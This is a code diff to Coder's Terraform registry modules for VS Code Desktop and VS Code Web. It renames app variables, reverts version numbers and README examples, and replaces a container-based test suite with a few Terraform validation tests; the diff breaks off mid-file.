+  version = "1.0.1"
 
   agent_id = var.agent_id
 
-  coder_app_icon         = "/icon/code.svg"
-  coder_app_slug         = "vscode"
-  coder_app_display_name = "VS Code Desktop"
-  coder_app_order        = var.order
-  coder_app_group        = var.group
+  web_app_icon         = "/icon/code.svg"
+  web_app_slug         = "vscode"
+  web_app_display_name = "VS Code Desktop"
+  web_app_order        = var.order
+  web_app_group        = var.group
 
   folder      = var.folder
   open_recent = var.open_recent

registry/coder/modules/vscode-desktop-core/main.test.ts

@@ -11,9 +11,9 @@ const appName = "vscode-desktop";
 const defaultVariables = {
   agent_id: "foo",
 
-  coder_app_icon: "/icon/code.svg",
-  coder_app_slug: "vscode",
-  coder_app_display_name: "VS Code Desktop",
+  web_app_icon: "/icon/code.svg",
+  web_app_slug: "vscode",
+  web_app_display_name: "VS Code Desktop",
 
   protocol: "vscode",
 };
@@ -99,16 +99,16 @@ describe("vscode-desktop-core", async () => {
       );
 
       expect(coder_app?.instances[0].attributes.slug).toBe(
-        defaultVariables.coder_app_slug,
+        defaultVariables.web_app_slug,
       );
       expect(coder_app?.instances[0].attributes.display_name).toBe(
-        defaultVariables.coder_app_display_name,
+        defaultVariables.web_app_display_name,
       );
     });
 
     it("sets order", async () => {
       const state = await runTerraformApply(import.meta.dir, {
-        coder_app_order: "5",
+        web_app_order: "5",
 
         ...defaultVariables,
       });
@@ -122,7 +122,7 @@ describe("vscode-desktop-core", async () => {
 
     it("sets group", async () => {
       const state = await runTerraformApply(import.meta.dir, {
-        coder_app_group: "web-app-group",
+        web_app_group: "web-app-group",
 
         ...defaultVariables,
       });

registry/coder/modules/vscode-desktop-core/main.tf

@@ -31,28 +31,28 @@ variable "protocol" {
   description = "The URI protocol the IDE."
 }
 
-variable "coder_app_icon" {
+variable "web_app_icon" {
   type        = string
   description = "The icon of the coder_app."
 }
 
-variable "coder_app_slug" {
+variable "web_app_slug" {
   type        = string
   description = "The slug of the coder_app."
 }
 
-variable "coder_app_display_name" {
+variable "web_app_display_name" {
   type        = string
   description = "The display name of the coder_app."
 }
 
-variable "coder_app_order" {
+variable "web_app_order" {
   type        = number
   description = "The order of the coder_app."
   default     = null
 }
 
-variable "coder_app_group" {
+variable "web_app_group" {
   type        = string
   description = "The group of the coder_app."
   default     = null
@@ -65,12 +65,12 @@ resource "coder_app" "vscode-desktop" {
   agent_id = var.agent_id
   external = true
 
-  icon         = var.coder_app_icon
-  slug         = var.coder_app_slug
-  display_name = var.coder_app_display_name
+  icon         = var.web_app_icon
+  slug         = var.web_app_slug
+  display_name = var.web_app_display_name
 
-  order = var.coder_app_order
-  group = var.coder_app_group
+  order = var.web_app_order
+  group = var.web_app_group
 
   url = join("", [
     var.protocol,

registry/coder/modules/vscode-desktop/README.md

@@ -16,7 +16,7 @@ Uses the [Coder Remote VS Code Extension](https://github.com/coder/vscode-coder)
 module "vscode" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/vscode-desktop/coder"
-  version  = "1.2.1"
+  version  = "1.2.0"
   agent_id = coder_agent.main.id
 }
 ```
@@ -29,7 +29,7 @@ module "vscode" {
 module "vscode" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/vscode-desktop/coder"
-  version  = "1.2.1"
+  version  = "1.2.0"
   agent_id = coder_agent.main.id
   folder   = "/home/coder/project"
 }

registry/coder/modules/vscode-desktop/main.tf

@@ -40,7 +40,7 @@ variable "group" {
 
 module "vscode-desktop-core" {
   source  = "registry.coder.com/coder/vscode-desktop-core/coder"
-  version = "1.0.2"
+  version = "1.0.0"
 
   agent_id = var.agent_id
 

registry/coder/modules/vscode-web/README.md

@@ -8,13 +8,13 @@ tags: [ide, vscode, web]
 
 # VS Code Web
 
-Automatically install the [VS Code CLI](https://code.visualstudio.com/docs/editor/command-line) and run `code serve-web` in a workspace to access VS Code via the browser.
+Automatically install [Visual Studio Code Server](https://code.visualstudio.com/docs/remote/vscode-server) in a workspace and create an app to access it via the dashboard.
 
 ```tf
 module "vscode-web" {
   count          = data.coder_workspace.me.start_count
   source         = "registry.coder.com/coder/vscode-web/coder"
-  version        = "2.0.0"
+  version        = "1.4.3"
   agent_id       = coder_agent.example.id
   accept_license = true
 }
@@ -30,7 +30,7 @@ module "vscode-web" {
 module "vscode-web" {
   count          = data.coder_workspace.me.start_count
   source         = "registry.coder.com/coder/vscode-web/coder"
-  version        = "2.0.0"
+  version        = "1.4.3"
   agent_id       = coder_agent.example.id
   install_prefix = "/home/coder/.vscode-web"
   folder         = "/home/coder"
@@ -44,22 +44,22 @@ module "vscode-web" {
 module "vscode-web" {
   count          = data.coder_workspace.me.start_count
   source         = "registry.coder.com/coder/vscode-web/coder"
-  version        = "2.0.0"
+  version        = "1.4.3"
   agent_id       = coder_agent.example.id
   extensions     = ["github.copilot", "ms-python.python", "ms-toolsai.jupyter"]
   accept_license = true
 }
 ```
 
-### Pre-configure Machine Settings
+### Pre-configure Settings
 
-Configure VS Code's [Machine settings.json](https://code.visualstudio.com/docs/getstarted/settings#_settings-json-file). These settings are merged with any existing machine settings on startup:
+Configure VS Code's [settings.json](https://code.visualstudio.com/docs/getstarted/settings#_settings-json-file) file:
 
 ```tf
 module "vscode-web" {
   count      = data.coder_workspace.me.start_count
   source     = "registry.coder.com/coder/vscode-web/coder"
-  version    = "2.0.0"
+  version    = "1.4.3"
   agent_id   = coder_agent.example.id
   extensions = ["dracula-theme.theme-dracula"]
   settings = {
@@ -69,7 +69,20 @@ module "vscode-web" {
 }
 ```
 
-> **Note:** Merging settings requires `jq` or `python3`. If neither is available, existing machine settings will be preserved. User settings configured through the VS Code UI are stored in browser local storage and will not persist across different browsers or devices.
+### Pin a specific VS Code Web version
+
+By default, this module installs the latest. To pin a specific version, retrieve the commit ID from the [VS Code Update API](https://update.code.visualstudio.com/api/commits/stable/server-linux-x64-web) and verify its corresponding release on the [VS Code GitHub Releases](https://github.com/microsoft/vscode/releases).
+
+```tf
+module "vscode-web" {
+  count          = data.coder_workspace.me.start_count
+  source         = "registry.coder.com/coder/vscode-web/coder"
+  version        = "1.4.3"
+  agent_id       = coder_agent.example.id
+  commit_id      = "e54c774e0add60467559eb0d1e229c6452cf8447"
+  accept_license = true
+}
+```
 
 ### Open an existing workspace on startup
 
@@ -78,43 +91,10 @@ Note: Either `workspace` or `folder` can be used, but not both simultaneously. T
 
 ```tf
 module "vscode-web" {
-  count          = data.coder_workspace.me.start_count
-  source         = "registry.coder.com/coder/vscode-web/coder"
-  version        = "2.0.0"
-  agent_id       = coder_agent.example.id
-  workspace      = "/home/coder/coder.code-workspace"
-  accept_license = true
+  count     = data.coder_workspace.me.start_count
+  source    = "registry.coder.com/coder/vscode-web/coder"
+  version   = "1.4.3"
+  agent_id  = coder_agent.example.id
+  workspace = "/home/coder/coder.code-workspace"
 }
 ```
-
-### Use VS Code Insiders
-
-Use the VS Code Insiders release channel to get the latest features and bug fixes:
-
-```tf
-module "vscode-web" {
-  count           = data.coder_workspace.me.start_count
-  source          = "registry.coder.com/coder/vscode-web/coder"
-  version         = "2.0.0"
-  agent_id        = coder_agent.example.id
-  release_channel = "insiders"
-  accept_license  = true
-}
-```
-
-### Pin a specific VS Code version
-
-Use the `commit_id` variable to pin a specific VS Code Server version by its commit SHA:
-
-```tf
-module "vscode-web" {
-  count          = data.coder_workspace.me.start_count
-  source         = "registry.coder.com/coder/vscode-web/coder"
-  version        = "2.0.0"
-  agent_id       = coder_agent.example.id
-  commit_id      = "e54c774e0add60467559eb0d1e229c6452cf8447"
-  accept_license = true
-}
-```
-
-You can find the commit SHA for a specific VS Code version on the [VS Code releases page](https://code.visualstudio.com/updates) or by checking the "About" dialog in VS Code.

registry/coder/modules/vscode-web/main.test.ts

@@ -1,793 +1,42 @@
-import {
-  describe,
-  expect,
-  it,
-  beforeAll,
-  afterEach,
-  setDefaultTimeout,
-} from "bun:test";
-import {
-  runTerraformApply,
-  runTerraformInit,
-  runContainer,
-  execContainer,
-  removeContainer,
-  findResourceInstance,
-} from "~test";
-
-// Set timeout to 5 minutes for tests that download VS Code CLI
-setDefaultTimeout(5 * 60 * 1000);
-
-let cleanupContainers: string[] = [];
-
-afterEach(async () => {
-  for (const id of cleanupContainers) {
-    try {
-      await removeContainer(id);
-    } catch {
-      // Ignore cleanup errors
-    }
-  }
-  cleanupContainers = [];
-});
+import { describe, expect, it } from "bun:test";
+import { runTerraformApply, runTerraformInit } from "~test";
 
 describe("vscode-web", async () => {
-  beforeAll(async () => {
-    await runTerraformInit(import.meta.dir);
+  await runTerraformInit(import.meta.dir);
+
+  it("accept_license should be set to true", () => {
+    const t = async () => {
+      await runTerraformApply(import.meta.dir, {
+        agent_id: "foo",
+        accept_license: "false",
+      });
+    };
+    expect(t).toThrow("Invalid value for variable");
   });
 
-  describe("terraform validation", () => {
-    it("accept_license should be set to true", async () => {
-      try {
-        await runTerraformApply(import.meta.dir, {
-          agent_id: "foo",
-          accept_license: false,
-        });
-        throw new Error("Expected terraform apply to fail");
-      } catch (ex) {
-        expect((ex as Error).message).toContain("Invalid value for variable");
-      }
-    });
-
-    it("use_cached and offline can not be used together", async () => {
-      try {
-        await runTerraformApply(import.meta.dir, {
-          agent_id: "foo",
-          accept_license: true,
-          use_cached: true,
-          offline: true,
-        });
-        throw new Error("Expected terraform apply to fail");
-      } catch (ex) {
-        expect((ex as Error).message).toContain(
-          "Offline and Use Cached can not be used together",
-        );
-      }
-    });
-
-    it("offline and extensions can not be used together", async () => {
-      try {
-        await runTerraformApply(import.meta.dir, {
-          agent_id: "foo",
-          accept_license: true,
-          offline: true,
-          extensions: '["ms-python.python"]',
-        });
-        throw new Error("Expected terraform apply to fail");
-      } catch (ex) {
-        expect((ex as Error).message).toContain(
-          "Offline mode does not allow extensions to be installed",
-        );
-      }
-    });
-
-    it("workspace and folder can not be used together", async () => {
-      try {
-        await runTerraformApply(import.meta.dir, {
-          agent_id: "foo",
-          accept_license: true,
-          folder: "/home/coder",
-          workspace: "/home/coder/test.code-workspace",
-        });
-        throw new Error("Expected terraform apply to fail");
-      } catch (ex) {
-        expect((ex as Error).message).toContain(
-          "Set only one of `workspace` or `folder`",
-        );
-      }
-    });
+  it("use_cached and offline can not be used together", () => {
+    const t = async () => {
+      await runTerraformApply(import.meta.dir, {
+        agent_id: "foo",
+        accept_license: "true",
+        use_cached: "true",
+        offline: "true",
+      });
+    };
+    expect(t).toThrow("Offline and Use Cached can not be used together");
   });
 
-  describe("script generation", () => {
-    it("generates script with correct port", async () => {
-      const state = await runTerraformApply(import.meta.dir, {
+  it("offline and extensions can not be used together", () => {
+    const t = async () => {
+      await runTerraformApply(import.meta.dir, {
         agent_id: "foo",
-        accept_license: true,
-        port: 8080,
+        accept_license: "true",
+        offline: "true",
+        extensions: '["1", "2"]',
       });
-      const script = findResourceInstance(state, "coder_script");
-      expect(script.script).toContain("--port 8080");
-    });
-
-    it("generates script with extensions directory", async () => {
-      const state = await runTerraformApply(import.meta.dir, {
-        agent_id: "foo",
-        accept_license: true,
-        extensions_dir: "/custom/extensions",
-      });
-      const script = findResourceInstance(state, "coder_script");
-      expect(script.script).toContain("--extensions-dir=/custom/extensions");
-    });
-
-    it("generates script with telemetry level", async () => {
-      const state = await runTerraformApply(import.meta.dir, {
-        agent_id: "foo",
-        accept_license: true,
-        telemetry_level: "off",
-      });
-      const script = findResourceInstance(state, "coder_script");
-      expect(script.script).toContain("--telemetry-level off");
-    });
-
-    it("generates script with disable trust", async () => {
-      const state = await runTerraformApply(import.meta.dir, {
-        agent_id: "foo",
-        accept_license: true,
-        disable_trust: true,
-      });
-      const script = findResourceInstance(state, "coder_script");
-      expect(script.script).toContain("--disable-workspace-trust");
-    });
-
-    it("generates script with serve-web command", async () => {
-      const state = await runTerraformApply(import.meta.dir, {
-        agent_id: "foo",
-        accept_license: true,
-      });
-      const script = findResourceInstance(state, "coder_script");
-      expect(script.script).toContain("serve-web");
-      expect(script.script).toContain("--accept-server-license-terms");
-      expect(script.script).toContain("--without-connection-token");
-    });
-
-    it("generates script with stable release channel by default", async () => {
-      const state = await runTerraformApply(import.meta.dir, {
-        agent_id: "foo",
-        accept_license: true,
-      });
-      const script = findResourceInstance(state, "coder_script");
-      expect(script.script).toContain("build=stable");
-    });
-
-    it("generates script with insiders release channel", async () => {
-      const state = await runTerraformApply(import.meta.dir, {
-        agent_id: "foo",
-        accept_license: true,
-        release_channel: "insiders",
-      });
-      const script = findResourceInstance(state, "coder_script");
-      expect(script.script).toContain("build=insiders");
-    });
-
-    it("generates script without commit-id value when not specified", async () => {
-      const state = await runTerraformApply(import.meta.dir, {
-        agent_id: "foo",
-        accept_license: true,
-      });
-      const script = findResourceInstance(state, "coder_script");
-      // The if condition should have an empty string, so no commit-id value is passed
-      expect(script.script).toContain('if [ -n "" ]; then');
-      // Should not contain any actual commit hash
-      expect(script.script).not.toMatch(/--commit-id [a-f0-9]{40}/);
-    });
-
-    it("generates script with commit-id when specified", async () => {
-      const state = await runTerraformApply(import.meta.dir, {
-        agent_id: "foo",
-        accept_license: true,
-        commit_id: "e54c774e0add60467559eb0d1e229c6452cf8447",
-      });
-      const script = findResourceInstance(state, "coder_script");
-      expect(script.script).toContain(
-        "--commit-id e54c774e0add60467559eb0d1e229c6452cf8447",
-      );
-    });
+    };
+    expect(t).toThrow("Offline mode does not allow extensions to be installed");
   });
 
-  describe("container integration tests", () => {
-    it("uses existing code CLI in PATH", async () => {
-      const state = await runTerraformApply(import.meta.dir, {
-        agent_id: "foo",
-        accept_license: true,
-      });
-
-      const containerId = await runContainer("ubuntu:22.04");
-      cleanupContainers.push(containerId);
-
-      // Create a mock code CLI that logs when serve-web is called
-      await execContainer(containerId, [
-        "bash",
-        "-c",
-        `cat > /usr/local/bin/code << 'MOCKEOF'
-#!/bin/bash
-if [ "\$1" = "serve-web" ]; then
-  echo "MOCK_SERVER_STARTED with args: \$@"
-  exit 0
-fi
-echo "code mock called: \$@"
-exit 0
-MOCKEOF
-chmod +x /usr/local/bin/code`,
-      ]);
-
-      const script = findResourceInstance(state, "coder_script");
-
-      // Run the script - the mock will capture the serve-web call
-      const result = await execContainer(containerId, [
-        "bash",
-        "-c",
-        script.script,
-      ]);
-
-      expect(result.exitCode).toBe(0);
-      expect(result.stdout).toContain("Found VS Code CLI");
-    });
-
-    it("offline mode fails when CLI not present", async () => {
-      const state = await runTerraformApply(import.meta.dir, {
-        agent_id: "foo",
-        accept_license: true,
-        offline: true,
-      });
-
-      const containerId = await runContainer("ubuntu:22.04");
-      cleanupContainers.push(containerId);
-
-      const script = findResourceInstance(state, "coder_script");
-
-      const result = await execContainer(containerId, [
-        "bash",
-        "-c",
-        script.script,
-      ]);
-
-      expect(result.exitCode).toBe(1);
-      expect(result.stdout).toContain(
-        "Offline mode enabled but no VS Code CLI, code-server, or cached VS Code Server found",
-      );
-    });
-
-    it("offline mode uses code-server as fallback", async () => {
-      const state = await runTerraformApply(import.meta.dir, {
-        agent_id: "foo",
-        accept_license: true,
-        offline: true,
-      });
-
-      const containerId = await runContainer("ubuntu:22.04");
-      cleanupContainers.push(containerId);
-
-      // Install mock code-server in PATH
-      await execContainer(containerId, [
-        "bash",
-        "-c",
-        `mkdir -p /usr/local/bin && cat > /usr/local/bin/code-server << 'MOCKEOF'
-#!/bin/bash
-echo "MOCK_CODE_SERVER_STARTED with args: $@"
-exit 0
-MOCKEOF
-chmod +x /usr/local/bin/code-server`,
-      ]);
-
-      const script = findResourceInstance(state, "coder_script");
-
-      const result = await execContainer(containerId, [
-        "bash",
-        "-c",
-        script.script,
-      ]);
-
-      expect(result.exitCode).toBe(0);
-      expect(result.stdout).toContain("offline fallback");
-      expect(result.stdout).toContain("Starting code-server");
-    });
-
-    it("offline mode works with pre-installed CLI", async () => {
-      const state = await runTerraformApply(import.meta.dir, {
-        agent_id: "foo",
-        accept_license: true,
-        offline: true,
-        install_prefix: "/tmp/vscode-web",
-      });
-
-      const containerId = await runContainer("ubuntu:22.04");
-      cleanupContainers.push(containerId);
-
-      // Pre-install mock code CLI at expected location
-      await execContainer(containerId, [
-        "bash",
-        "-c",
-        `mkdir -p /tmp/vscode-web/bin && cat > /tmp/vscode-web/bin/code << 'MOCKEOF'
-#!/bin/bash
-if [ "\$1" = "serve-web" ]; then
-  echo "MOCK_OFFLINE_SERVER_STARTED"
-  exit 0
-fi
-exit 0
-MOCKEOF
-chmod +x /tmp/vscode-web/bin/code`,
-      ]);
-
-      const script = findResourceInstance(state, "coder_script");
-
-      const result = await execContainer(containerId, [
-        "bash",
-        "-c",
-        script.script,
-      ]);
-
-      expect(result.exitCode).toBe(0);
-      expect(result.stdout).toContain("Using cached VS Code CLI");
-      expect(result.stdout).toContain("Starting VS Code Web");
-    });
-
-    it("use_cached mode works with pre-installed CLI", async () => {
-      const state = await runTerraformApply(import.meta.dir, {
-        agent_id: "foo",
-        accept_license: true,
-        use_cached: true,
-        install_prefix: "/tmp/vscode-web",
-      });
-
-      const containerId = await runContainer("ubuntu:22.04");
-      cleanupContainers.push(containerId);
-
-      // Pre-install mock code CLI
-      await execContainer(containerId, [
-        "bash",
-        "-c",
-        `mkdir -p /tmp/vscode-web/bin && cat > /tmp/vscode-web/bin/code << 'MOCKEOF'
-#!/bin/bash
-if [ "\$1" = "serve-web" ]; then
-  echo "MOCK_CACHED_SERVER_STARTED"
-  exit 0
-fi
-exit 0
-MOCKEOF
-chmod +x /tmp/vscode-web/bin/code`,
-      ]);
-
-      const script = findResourceInstance(state, "coder_script");
-
-      const result = await execContainer(containerId, [
-        "bash",
-        "-c",
-        script.script,
-      ]);
-
-      expect(result.exitCode).toBe(0);
-      expect(result.stdout).toContain("Using cached VS Code CLI");
-    });
-
-    it("creates settings file with correct content", async () => {
-      const state = await runTerraformApply(import.meta.dir, {
-        agent_id: "foo",
-        accept_license: true,
-        settings: '{"editor.fontSize": 14}',
-      });
-
-      const containerId = await runContainer("ubuntu:22.04");
-      cleanupContainers.push(containerId);
-
-      // Create a mock code CLI
-      await execContainer(containerId, [
-        "bash",
-        "-c",
-        `mkdir -p /usr/local/bin && cat > /usr/local/bin/code << 'MOCKEOF'
-#!/bin/bash
-exit 0
-MOCKEOF
-chmod +x /usr/local/bin/code`,
-      ]);
-
-      const script = findResourceInstance(state, "coder_script");
-
-      await execContainer(containerId, ["bash", "-c", script.script]);
-
-      // Check that settings file was created
-      const settingsResult = await execContainer(containerId, [
-        "cat",
-        "/root/.vscode-server/data/Machine/settings.json",
-      ]);
-
-      expect(settingsResult.exitCode).toBe(0);
-      expect(settingsResult.stdout).toContain("editor.fontSize");
-      expect(settingsResult.stdout).toContain("14");
-    });
-
-    it("creates settings file with multiple settings", async () => {
-      const settings = {
-        "editor.fontSize": 16,
-        "editor.tabSize": 2,
-        "workbench.colorTheme": "Dracula",
-        "editor.formatOnSave": true,
-      };
-
-      const state = await runTerraformApply(import.meta.dir, {
-        agent_id: "foo",
-        accept_license: true,
-        settings: JSON.stringify(settings),
-      });
-
-      const containerId = await runContainer("ubuntu:22.04");
-      cleanupContainers.push(containerId);
-
-      // Create a mock code CLI
-      await execContainer(containerId, [
-        "bash",
-        "-c",
-        `mkdir -p /usr/local/bin && cat > /usr/local/bin/code << 'MOCKEOF'
-#!/bin/bash
-exit 0
-MOCKEOF
-chmod +x /usr/local/bin/code`,
-      ]);
-
-      const script = findResourceInstance(state, "coder_script");
-
-      await execContainer(containerId, ["bash", "-c", script.script]);
-
-      // Check that settings file was created with all settings
-      const settingsResult = await execContainer(containerId, [
-        "cat",
-        "/root/.vscode-server/data/Machine/settings.json",
-      ]);
-
-      expect(settingsResult.exitCode).toBe(0);
-      expect(settingsResult.stdout).toContain("editor.fontSize");
-      expect(settingsResult.stdout).toContain("16");
-      expect(settingsResult.stdout).toContain("editor.tabSize");
-      expect(settingsResult.stdout).toContain("2");
-      expect(settingsResult.stdout).toContain("workbench.colorTheme");
-      expect(settingsResult.stdout).toContain("Dracula");
-      expect(settingsResult.stdout).toContain("editor.formatOnSave");
-      expect(settingsResult.stdout).toContain("true");
-    });
-
-    it("creates settings file in correct directory structure", async () => {
-      const state = await runTerraformApply(import.meta.dir, {
-        agent_id: "foo",
-        accept_license: true,
-        settings: '{"test.setting": "value"}',
-      });
-
-      const containerId = await runContainer("ubuntu:22.04");
-      cleanupContainers.push(containerId);
-
-      // Create a mock code CLI
-      await execContainer(containerId, [
-        "bash",
-        "-c",
-        `mkdir -p /usr/local/bin && cat > /usr/local/bin/code << 'MOCKEOF'
-#!/bin/bash
-exit 0
-MOCKEOF
-chmod +x /usr/local/bin/code`,
-      ]);
-
-      const script = findResourceInstance(state, "coder_script");
-
-      await execContainer(containerId, ["bash", "-c", script.script]);
-
-      // Verify directory structure was created
-      const dirResult = await execContainer(containerId, [
-        "ls",
-        "-la",
-        "/root/.vscode-server/data/Machine/",
-      ]);
-
-      expect(dirResult.exitCode).toBe(0);
-      expect(dirResult.stdout).toContain("settings.json");
-
-      // Verify parent directories exist
-      const parentDirResult = await execContainer(containerId, [
-        "ls",
-        "-la",
-        "/root/.vscode-server/data/",
-      ]);
-
-      expect(parentDirResult.exitCode).toBe(0);
-      expect(parentDirResult.stdout).toContain("Machine");
-    });
-
-    it("merges settings with existing settings file", async () => {
-      const state = await runTerraformApply(import.meta.dir, {
-        agent_id: "foo",
-        accept_license: true,
-        settings: '{"new.setting": "new_value"}',
-      });
-
-      const containerId = await runContainer("ubuntu:22.04");
-      cleanupContainers.push(containerId);
-
-      // Install jq and create mock code CLI
-      await execContainer(containerId, ["apt-get", "update", "-qq"]);
-      await execContainer(containerId, [
-        "apt-get",
-        "install",
-        "-y",
-        "-qq",
-        "jq",
-      ]);
-      await execContainer(containerId, [
-        "bash",
-        "-c",
-        `mkdir -p /usr/local/bin && cat > /usr/local/bin/code << 'MOCKEOF'
-#!/bin/bash
-exit 0
-MOCKEOF
-chmod +x /usr/local/bin/code`,
-      ]);
-
-      // Pre-create an existing settings file
-      await execContainer(containerId, [
-        "bash",
-        "-c",
-        `mkdir -p /root/.vscode-server/data/Machine && echo '{"existing.setting": "existing_value"}' > /root/.vscode-server/data/Machine/settings.json`,
-      ]);
-
-      const script = findResourceInstance(state, "coder_script");
-
-      await execContainer(containerId, ["bash", "-c", script.script]);
-
-      // Check that settings were merged (both existing and new should be present)
-      const settingsResult = await execContainer(containerId, [
-        "cat",
-        "/root/.vscode-server/data/Machine/settings.json",
-      ]);
-
-      expect(settingsResult.exitCode).toBe(0);
-      // Should contain both existing and new settings
-      expect(settingsResult.stdout).toContain("existing.setting");
-      expect(settingsResult.stdout).toContain("existing_value");
-      expect(settingsResult.stdout).toContain("new.setting");
-      expect(settingsResult.stdout).toContain("new_value");
-    });
-
-    it("creates valid JSON settings file", async () => {
-      const settings = {
-        "editor.fontSize": 14,
-        "editor.wordWrap": "on",
-        "files.autoSave": "afterDelay",
-        "files.autoSaveDelay": 1000,
-      };
-
-      const state = await runTerraformApply(import.meta.dir, {
-        agent_id: "foo",
-        accept_license: true,
-        settings: JSON.stringify(settings),
-      });
-
-      const containerId = await runContainer("ubuntu:22.04");
-      cleanupContainers.push(containerId);
-
-      // Install jq and create mock code CLI
-      await execContainer(containerId, ["apt-get", "update", "-qq"]);
-      await execContainer(containerId, [
-        "apt-get",
-        "install",
-        "-y",
-        "-qq",
-        "jq",
-      ]);
-      await execContainer(containerId, [
-        "bash",
-        "-c",
-        `mkdir -p /usr/local/bin && cat > /usr/local/bin/code << 'MOCKEOF'
-#!/bin/bash
-exit 0
-MOCKEOF
-chmod +x /usr/local/bin/code`,
-      ]);
-
-      const script = findResourceInstance(state, "coder_script");
-
-      await execContainer(containerId, ["bash", "-c", script.script]);
-
-      // Validate JSON using jq
-      const jsonValidResult = await execContainer(containerId, [
-        "bash",
-        "-c",
-        "jq '.' /root/.vscode-server/data/Machine/settings.json",
-      ]);
-
-      expect(jsonValidResult.exitCode).toBe(0);
-
-      // Extract specific values using jq
-      const fontSizeResult = await execContainer(containerId, [
-        "bash",
-        "-c",
-        "jq '.\"editor.fontSize\"' /root/.vscode-server/data/Machine/settings.json",
-      ]);
-      expect(fontSizeResult.stdout.trim()).toBe("14");
-
-      const wordWrapResult = await execContainer(containerId, [
-        "bash",
-        "-c",
-        "jq '.\"editor.wordWrap\"' /root/.vscode-server/data/Machine/settings.json",
-      ]);
-      expect(wordWrapResult.stdout.trim()).toBe('"on"');
-
-      const autoSaveDelayResult = await execContainer(containerId, [
-        "bash",
-        "-c",
-        "jq '.\"files.autoSaveDelay\"' /root/.vscode-server/data/Machine/settings.json",
-      ]);
-      expect(autoSaveDelayResult.stdout.trim()).toBe("1000");
-    });
-
-    it("installs extensions", async () => {
-      const state = await runTerraformApply(import.meta.dir, {
-        agent_id: "foo",
-        accept_license: true,
-        extensions: '["ms-python.python", "golang.go"]',
-      });
-
-      const containerId = await runContainer("ubuntu:22.04");
-      cleanupContainers.push(containerId);
-
-      // Create a mock code CLI that logs extension installs
-      await execContainer(containerId, [
-        "bash",
-        "-c",
-        `mkdir -p /usr/local/bin && cat > /usr/local/bin/code << 'MOCKEOF'
-#!/bin/bash
-if [ "\$1" = "--install-extension" ]; then
-  echo "MOCK_EXTENSION_INSTALL: \$2"
-fi
-exit 0
-MOCKEOF
-chmod +x /usr/local/bin/code`,
-      ]);
-
-      const script = findResourceInstance(state, "coder_script");
-
-      const result = await execContainer(containerId, [
-        "bash",
-        "-c",
-        script.script,
-      ]);
-
-      expect(result.exitCode).toBe(0);
-      expect(result.stdout).toContain("Installing extension");
-      expect(result.stdout).toContain("ms-python.python");
-      expect(result.stdout).toContain("golang.go");
-    });
-
-    it("runs with correct server arguments", async () => {
-      const state = await runTerraformApply(import.meta.dir, {
-        agent_id: "foo",
-        accept_license: true,
-        port: 9999,
-        telemetry_level: "off",
-      });
-
-      const containerId = await runContainer("ubuntu:22.04");
-      cleanupContainers.push(containerId);
-
-      // Create a mock code CLI that captures all arguments
-      await execContainer(containerId, [
-        "bash",
-        "-c",
-        `mkdir -p /usr/local/bin && cat > /usr/local/bin/code << 'MOCKEOF'
-#!/bin/bash
-echo "MOCK_CODE_ARGS: \$@"
-exit 0
-MOCKEOF
-chmod +x /usr/local/bin/code`,
-      ]);
-
-      const script = findResourceInstance(state, "coder_script");
-
-      const result = await execContainer(containerId, [
-        "bash",
-        "-c",
-        script.script,
-      ]);
-
-      expect(result.exitCode).toBe(0);
-      // Check the output contains expected port message
-      expect(result.stdout).toContain("Starting VS Code Web on port 9999");
-    });
-
-    it("passes commit-id to code CLI when specified", async () => {
-      const state = await runTerraformApply(import.meta.dir, {
-        agent_id: "foo",
-        accept_license: true,
-        commit_id: "abc123def456",
-      });
-
-      const containerId = await runContainer("ubuntu:22.04");
-      cleanupContainers.push(containerId);
-
-      // Create a mock code CLI that logs arguments to the log file (where output is redirected)
-      await execContainer(containerId, [
-        "bash",
-        "-c",
-        `mkdir -p /usr/local/bin && cat > /usr/local/bin/code << 'MOCKEOF'
-#!/bin/bash
-echo "MOCK_CODE_ARGS: $@"
-exit 0
-MOCKEOF
-chmod +x /usr/local/bin/code`,
-      ]);
-
-      const script = findResourceInstance(state, "coder_script");
-
-      await execContainer(containerId, ["bash", "-c", script.script]);
-
-      // Wait briefly for background process to write to log
-      await new Promise((resolve) => setTimeout(resolve, 500));
-
-      // Check the log file for the arguments (code CLI output goes there)
-      const logResult = await execContainer(containerId, [
-        "cat",
-        "/tmp/vscode-web.log",
-      ]);
-
-      expect(logResult.exitCode).toBe(0);
-      expect(logResult.stdout).toContain("--commit-id abc123def456");
-    });
-
-    // This test downloads and starts the real VS Code server
-    it("starts real VS Code CLI and responds to healthcheck (requires network)", async () => {
-      const state = await runTerraformApply(import.meta.dir, {
-        agent_id: "foo",
-        accept_license: true,
-        port: 13338,
-        install_prefix: "/tmp/vscode-web",
-      });
-
-      const containerId = await runContainer("ubuntu:22.04");
-      cleanupContainers.push(containerId);
-
-      // Install curl for downloading CLI and healthcheck
-      await execContainer(containerId, ["apt-get", "update", "-qq"]);
-      await execContainer(containerId, [
-        "apt-get",
-        "install",
-        "-y",
-        "-qq",
-        "curl",
-      ]);
-
-      const script = findResourceInstance(state, "coder_script");
-
-      // Run the script - it will start the server in background
-      const startResult = await execContainer(containerId, [
-        "bash",
-        "-c",
-        script.script,
-      ]);
-
-      expect(startResult.exitCode).toBe(0);
-      expect(startResult.stdout).toContain("Starting VS Code Web");
-
-      // Wait for server to start and check healthcheck
-      await new Promise((resolve) => setTimeout(resolve, 10000));
-
-      const healthResult = await execContainer(containerId, [
-        "curl",
-        "-s",
-        "-o",
-        "/dev/null",
-        "-w",
-        "%{http_code}",
-        "http://127.0.0.1:13338/healthz",
-      ]);
-
-      // Server should respond (200, 202, or 404 is acceptable - means server is running)
-      expect(["200", "202", "404"]).toContain(healthResult.stdout.trim());
-    });
-  });
+  // More tests depend on shebang refactors
 });

registry/coder/modules/vscode-web/main.tf

@@ -59,6 +59,12 @@ variable "install_prefix" {
   default     = "/tmp/vscode-web"
 }
 
+variable "commit_id" {
+  type        = string
+  description = "Specify the commit ID of the VS Code Web binary to pin to a specific version. If left empty, the latest stable version is used."
+  default     = ""
+}
+
 variable "extensions" {
   type        = list(string)
   description = "A list of extensions to install."
@@ -99,7 +105,7 @@ variable "group" {
 
 variable "settings" {
   type        = any
-  description = "A map of settings to apply to VS Code Web's Machine settings. These settings are merged with any existing machine settings on startup."
+  description = "A map of settings to apply to VS Code web."
   default     = {}
 }
 
@@ -142,35 +148,25 @@ variable "subdomain" {
   default     = true
 }
 
+variable "platform" {
+  type        = string
+  description = "The platform to use for the VS Code Web."
+  default     = ""
+  validation {
